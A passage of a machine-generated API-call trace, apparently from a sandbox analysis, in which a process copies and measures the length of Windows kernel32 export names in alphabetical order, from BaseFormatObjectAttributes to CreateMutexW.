lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.973] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.973] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.973] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.973] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.973] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.973] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.973] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.974] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.974] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.974] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.974] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.974] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.974] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.974] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.974] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.974] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.974] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.974] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.974] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.974] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.974] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.974] lstrlenA (lpString="BEEP") returned 4 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.974] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.974] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.974] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.974] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.975] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.975] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.975] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.975] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.975] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.975] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.975] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.975] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.975] lstrlenA (lpString="CANCELIO") returned 8 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.975] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.975] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.975] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.975] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.975] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.975] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.975] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.975] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.975] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.975] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.975] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.976] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.976] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.976] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.976] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.976] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.976] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.976] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.976] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.976] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.976] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.976] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.976] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.976] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.976] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.976] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.976] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.976] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.976] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.976] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.977] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.977] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.977] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.977] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.977] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.977] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.977] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.977] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.977] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.977] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.977] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.977] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.977] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.977] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.977] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.977] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.977] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.977] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.977] lstrlenA (lpString="COPYFILEA") returned 9 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.978] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.978] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.978] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.978] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.978] lstrlenA (lpString="COPYFILEW") returned 9 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.978] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.978] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.978] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.978] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.978] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.978] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.978] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.978] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.978] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.978] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.978] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.978] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.978] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.978] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.979] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.979] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.979] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.979] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.979] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.979] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.979] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.979] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.979] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.979] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.979] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.979] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.979] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.979] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.979] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.979] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.979] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.979] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.979] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.980] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.980] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.980] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.980] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.980] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.980] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.980] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.980] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.980] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.980] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.980] lstrlenA 